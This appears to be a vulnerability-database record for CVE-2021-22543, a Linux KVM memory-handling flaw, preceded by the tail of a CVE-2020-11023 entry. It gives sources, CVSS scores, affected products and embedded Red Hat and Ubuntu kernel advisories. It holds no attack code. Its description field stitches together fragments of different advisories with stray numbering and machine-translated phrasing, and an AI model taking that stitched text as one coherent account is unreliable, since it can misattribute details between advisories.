"url": "https://access.redhat.com/security/cve/cve-2020-9283"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9283"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8203"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8203"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12666"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3369"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12666"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14040"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163560"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "171211"
},
{
"db": "PACKETSTORM",
"id": "170821"
},
{
"db": "PACKETSTORM",
"id": "170819"
},
{
"db": "PACKETSTORM",
"id": "170817"
},
{
"db": "PACKETSTORM",
"id": "168304"
},
{
"db": "PACKETSTORM",
"id": "158555"
},
{
"db": "PACKETSTORM",
"id": "159513"
},
{
"db": "PACKETSTORM",
"id": "158797"
},
{
"db": "NVD",
"id": "CVE-2020-11023"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-163560",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159852",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171212",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171211",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170821",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170819",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170817",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168304",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158555",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159513",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158797",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-11023",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-04-29T00:00:00",
"db": "VULHUB",
"id": "VHN-163560",
"ident": null
},
{
"date": "2020-11-04T15:29:15",
"db": "PACKETSTORM",
"id": "159852",
"ident": null
},
{
"date": "2023-03-02T15:19:19",
"db": "PACKETSTORM",
"id": "171212",
"ident": null
},
{
"date": "2023-03-02T15:19:02",
"db": "PACKETSTORM",
"id": "171211",
"ident": null
},
{
"date": "2023-01-31T17:21:40",
"db": "PACKETSTORM",
"id": "170821",
"ident": null
},
{
"date": "2023-01-31T17:19:24",
"db": "PACKETSTORM",
"id": "170819",
"ident": null
},
{
"date": "2023-01-31T17:16:43",
"db": "PACKETSTORM",
"id": "170817",
"ident": null
},
{
"date": "2022-09-08T14:41:25",
"db": "PACKETSTORM",
"id": "168304",
"ident": null
},
{
"date": "2020-07-27T17:38:33",
"db": "PACKETSTORM",
"id": "158555",
"ident": null
},
{
"date": "2020-10-08T16:49:58",
"db": "PACKETSTORM",
"id": "159513",
"ident": null
},
{
"date": "2020-08-07T18:27:30",
"db": "PACKETSTORM",
"id": "158797",
"ident": null
},
{
"date": "2020-04-29T21:15:11.743000",
"db": "NVD",
"id": "CVE-2020-11023",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-03T00:00:00",
"db": "VULHUB",
"id": "VHN-163560",
"ident": null
},
{
"date": "2025-11-07T19:32:52.023000",
"db": "NVD",
"id": "CVE-2020-11023",
"ident": null
}
]
},
"title": {
"_id": null,
"data": "Red Hat Security Advisory 2020-4847-01",
"sources": [
{
"db": "PACKETSTORM",
"id": "159852"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "code execution, xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "171211"
},
{
"db": "PACKETSTORM",
"id": "170821"
},
{
"db": "PACKETSTORM",
"id": "170819"
},
{
"db": "PACKETSTORM",
"id": "170817"
},
{
"db": "PACKETSTORM",
"id": "168304"
},
{
"db": "PACKETSTORM",
"id": "159513"
}
],
"trust": 0.7
}
}
VAR-202105-1451
Vulnerability from variot - Updated: 2026-04-10 23:33An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users with the ability to start and control a VM to read/write random pages of memory and can result in local privilege escalation. Linux Kernel Is vulnerable to a buffer error.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Arch Linux is an application system of Arch open source. A lightweight and flexible Linux® distribution that tries to keep it simple. (BZ#2010171)
- These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
Bug Fix(es):
- Rebase package(s) to version: 1.2.23
Highlights, important fixes, or notable enhancements:
-
imgbase should not copy the selinux binary policy file (BZ# 1979624) (BZ#1989397)
-
RHV-H has been rebased on Red Hat Enterprise Linux 8.4 Batch #2. (BZ#1975177)
-
8) - x86_64
-
Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Bug Fix(es):
-
kernel-rt: update RT source tree to the RHEL-8.4.z source tree (BZ#1985050)
-
kernel-rt: Merge mm/memcg: Fix kmem_cache_alloc() performance regression (BZ#1987102)
-
8.2) - aarch64, noarch, ppc64le, s390x, x86_64
Bug Fix(es):
-
[Regression] RHEL8.2 - ISST-LTE:pVM:diapvmlp83:sum:memory DLPAR fails to add memory on multiple trials[mm/memory_hotplug.c:1163] (mm-) (BZ#1930169)
-
Every server is displaying the same power levels for all of our i40e 25G interfaces. 10G interfaces seem to be correct. Ethtool version is 5.0 (BZ#1967100)
-
s390/uv: Fix handling of length extensions (BZ#1975657)
-
RHEL 8.3 using FCOE via a FastLinQ QL45000 card will not manually scan in LUN from Target_id's over 8 (BZ#1976265)
-
Backport "tick/nohz: Conditionally restart tick on idle exit" to RHEL 8.5 (BZ#1978711)
-
rhel8.3: phase 2 netfilter backports from upstream (BZ#1980323)
-
xfrm: backports from upstream (BZ#1981841)
Enhancement(s):
-
[8.2.z] Incorrect parsing of ACPI HMAT table reports incorrect kernel WARNING taint (BZ#1943702)
-
Only selected patches from [IBM 8.4 FEAT] ibmvnic: Backport FW950 and assorted bug fixes (BZ#1980795)
-
========================================================================== Ubuntu Security Notice USN-5071-3 September 22, 2021
linux-raspi, linux-raspi-5.4 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
Several security issues were fixed in the Linux kernel.
Software Description: - linux-raspi: Linux kernel for Raspberry Pi (V8) systems - linux-raspi-5.4: Linux kernel for Raspberry Pi (V8) systems
Details:
It was discovered that the KVM hypervisor implementation in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. An attacker who could start and control a VM could possibly use this to expose sensitive information or execute arbitrary code. (CVE-2021-22543)
Murray McAllister discovered that the joystick device interface in the Linux kernel did not properly validate data passed via an ioctl(). A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code on systems with a joystick device registered. (CVE-2021-3612)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 20.04 LTS: linux-image-5.4.0-1043-raspi 5.4.0-1043.47 linux-image-raspi 5.4.0.1043.78 linux-image-raspi2 5.4.0.1043.78
Ubuntu 18.04 LTS: linux-image-5.4.0-1043-raspi 5.4.0-1043.47~18.04.1 linux-image-raspi-hwe-18.04 5.4.0.1043.46
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. 7.7) - ppc64le, x86_64
- Description:
This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2021:3987-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:3987 Issue date: 2021-10-26 CVE Names: CVE-2019-20934 CVE-2020-36385 CVE-2021-3653 CVE-2021-3656 CVE-2021-22543 CVE-2021-37576 =====================================================================
- Summary:
An update for kernel is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP Solutions.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Server AUS (v. 7.7) - noarch, x86_64 Red Hat Enterprise Linux Server E4S (v. 7.7) - noarch, ppc64le, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64 Red Hat Enterprise Linux Server Optional E4S (v. 7.6) - ppc64le, x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64 Red Hat Enterprise Linux Server TUS (v. 7.7) - noarch, x86_64
- Description:
The kernel packages contain the Linux kernel, the core of any Linux operating system.
Bug Fix(es):
-
A race between i40e_ndo_set_vf_mac() and i40e_vsi_clear() in the i40e driver causes a use after free condition of the kmalloc-4096 slab cache. (BZ#1980333)
-
Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
- Package List:
Red Hat Enterprise Linux Server AUS (v. 7.7):
Source: kernel-3.10.0-1062.59.1.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-1062.59.1.el7.noarch.rpm kernel-doc-3.10.0-1062.59.1.el7.noarch.rpm
x86_64: bpftool-3.10.0-1062.59.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.59.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.59.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.59.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.59.1.el7.x86_64.rpm perf-3.10.0-1062.59.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm python-perf-3.10.0-1062.59.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server E4S (v. 7.7):
Source: kernel-3.10.0-1062.59.1.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-1062.59.1.el7.noarch.rpm kernel-doc-3.10.0-1062.59.1.el7.noarch.rpm
ppc64le: bpftool-3.10.0-1062.59.1.el7.ppc64le.rpm bpftool-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-debug-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-devel-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-headers-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-tools-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-tools-libs-3.10.0-1062.59.1.el7.ppc64le.rpm perf-3.10.0-1062.59.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm python-perf-3.10.0-1062.59.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm
x86_64: bpftool-3.10.0-1062.59.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.59.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.59.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.59.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.59.1.el7.x86_64.rpm perf-3.10.0-1062.59.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm python-perf-3.10.0-1062.59.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server TUS (v. 7.7):
Source: kernel-3.10.0-1062.59.1.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-1062.59.1.el7.noarch.rpm kernel-doc-3.10.0-1062.59.1.el7.noarch.rpm
x86_64: bpftool-3.10.0-1062.59.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.59.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.59.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.59.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.59.1.el7.x86_64.rpm perf-3.10.0-1062.59.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm python-perf-3.10.0-1062.59.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 7.7):
x86_64: bpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.59.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional E4S (v. 7.6):
ppc64le: bpftool-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-debug-devel-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-1062.59.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm
x86_64: bpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.59.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional TUS (v. 7.7):
x86_64: bpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.59.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2019-20934 https://access.redhat.com/security/cve/CVE-2020-36385 https://access.redhat.com/security/cve/CVE-2021-3653 https://access.redhat.com/security/cve/CVE-2021-3656 https://access.redhat.com/security/cve/CVE-2021-22543 https://access.redhat.com/security/cve/CVE-2021-37576 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYXew09zjgjWX9erEAQh/NRAAlpTOJdaVIZiu4IJtVrtRh2JGkgTlL2Pi KIpqyIeBFsUwRh0pg9GE10q4NRk/DqMYTXvc2GJaNUZlRbzEhLxZXKqksfea6kmo wwGdORkerZrbE8QYF/FRC/6Bxi99lvoH0rSEeJeX0bM6vVwu9ubp7Xbdp4hmq08S 1VsG5ftGK6hQJPyxVDgPIHK1FHE5dVz1puyM10eY5NgabKCdD8oCC9/OL1hxFjAv ADTfFombilFItZoYa9rQdpoQ7s5CBZ1H6VbA+d9CvUltfzRzr6EUflL/rM3af3s1 PTSGqTSqdAZRoebwFvqKlHSoK2B7Wrinxs0kIGbvf3S2MbGklfzb6GaB4QZZ490T WRuTiJZTvMP0jqQyW0nTCMbxfqo3NgKbQt2wQSGYYDlwq65vhuuQAghGVPEoBPhS T9inwoSthoj7uxni1E58TXwPhzfEPXSTAkEZvu05BLt1AXRA+RrNH/B7VIHx30oX fkdz6MFeO/SWIb/CWf5YQVD3Xfsk+9rg2JWGWjnAE2WV9lhsVqhlidL36uaL6kmA LGrb/ZQcsVIPIM+HQRme15MBsg3GervoIHWkWOPbXvU4fYHxID2YkLMZQ6vtGHE2 DHe1+11yo2WKvdWB5nrbsIDBYBJLKT12DxsbycCeH2rLS7qDsfw/XDshAaFnPXZM G9cg8fFnilE= =hTrt -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "eq",
"trust": 1.0,
"vendor": "linux",
"version": "2021-05-18"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": null,
"trust": 0.8,
"vendor": "linux",
"version": null
},
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "baseboard management controller",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": null,
"trust": 0.8,
"vendor": "fedora",
"version": null
},
{
"_id": null,
"model": "gnu/linux",
"scope": null,
"trust": 0.8,
"vendor": "debian",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
},
{
"db": "NVD",
"id": "CVE-2021-22543"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "164565"
},
{
"db": "PACKETSTORM",
"id": "163926"
},
{
"db": "PACKETSTORM",
"id": "163770"
},
{
"db": "PACKETSTORM",
"id": "164469"
},
{
"db": "PACKETSTORM",
"id": "163995"
},
{
"db": "PACKETSTORM",
"id": "164666"
},
{
"db": "PACKETSTORM",
"id": "164652"
}
],
"trust": 0.7
},
"cve": "CVE-2021-22543",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2021-22543",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-380980",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2021-22543",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-22543",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-22543",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2021-22543",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202105-1684",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-380980",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-22543",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-380980"
},
{
"db": "VULMON",
"id": "CVE-2021-22543"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1684"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
},
{
"db": "NVD",
"id": "CVE-2021-22543"
}
]
},
"description": {
"_id": null,
"data": "An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users with the ability to start and control a VM to read/write random pages of memory and can result in local privilege escalation. Linux Kernel Is vulnerable to a buffer error.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Arch Linux is an application system of Arch open source. A lightweight and flexible Linux\u00ae distribution that tries to keep it simple. (BZ#2010171)\n\n4. \nThese packages include redhat-release-virtualization-host, ovirt-node, and\nrhev-hypervisor. RHVH features a Cockpit user interface for\nmonitoring the host\u0027s resources and performing administrative tasks. \n\nBug Fix(es):\n\n* Rebase package(s) to version: 1.2.23\n\nHighlights, important fixes, or notable enhancements: \n\n* imgbase should not copy the selinux binary policy file (BZ# 1979624)\n(BZ#1989397)\n\n* RHV-H has been rebased on Red Hat Enterprise Linux 8.4 Batch #2. \n(BZ#1975177)\n\n4. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the RHEL-8.4.z source tree\n(BZ#1985050)\n\n* kernel-rt: Merge mm/memcg: Fix kmem_cache_alloc() performance regression\n(BZ#1987102)\n\n4. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nBug Fix(es):\n\n* [Regression] RHEL8.2 - ISST-LTE:pVM:diapvmlp83:sum:memory DLPAR fails to\nadd memory on multiple trials[mm/memory_hotplug.c:1163] (mm-) (BZ#1930169)\n\n* Every server is displaying the same power levels for all of our i40e 25G\ninterfaces. 10G interfaces seem to be correct. Ethtool version is 5.0\n(BZ#1967100)\n\n* s390/uv: Fix handling of length extensions (BZ#1975657)\n\n* RHEL 8.3 using FCOE via a FastLinQ QL45000 card will not manually scan in\nLUN from Target_id\u0027s over 8 (BZ#1976265)\n\n* Backport \"tick/nohz: Conditionally restart tick on idle exit\" to RHEL 8.5\n(BZ#1978711)\n\n* rhel8.3: phase 2 netfilter backports from upstream (BZ#1980323)\n\n* xfrm: backports from upstream (BZ#1981841)\n\nEnhancement(s):\n\n* [8.2.z] Incorrect parsing of ACPI HMAT table reports incorrect kernel\nWARNING taint (BZ#1943702)\n\n* Only selected patches from [IBM 8.4 FEAT] ibmvnic: Backport FW950 and\nassorted bug fixes (BZ#1980795)\n\n4. ==========================================================================\nUbuntu Security Notice USN-5071-3\nSeptember 22, 2021\n\nlinux-raspi, linux-raspi-5.4 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-raspi: Linux kernel for Raspberry Pi (V8) systems\n- linux-raspi-5.4: Linux kernel for Raspberry Pi (V8) systems\n\nDetails:\n\nIt was discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly perform reference counting in some situations,\nleading to a use-after-free vulnerability. An attacker who could start and\ncontrol a VM could possibly use this to expose sensitive information or\nexecute arbitrary code. (CVE-2021-22543)\n\nMurray McAllister discovered that the joystick device interface in the\nLinux kernel did not properly validate data passed via an ioctl(). A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code on systems with a joystick device\nregistered. (CVE-2021-3612)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n linux-image-5.4.0-1043-raspi 5.4.0-1043.47\n linux-image-raspi 5.4.0.1043.78\n linux-image-raspi2 5.4.0.1043.78\n\nUbuntu 18.04 LTS:\n linux-image-5.4.0-1043-raspi 5.4.0-1043.47~18.04.1\n linux-image-raspi-hwe-18.04 5.4.0.1043.46\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 7.7) - 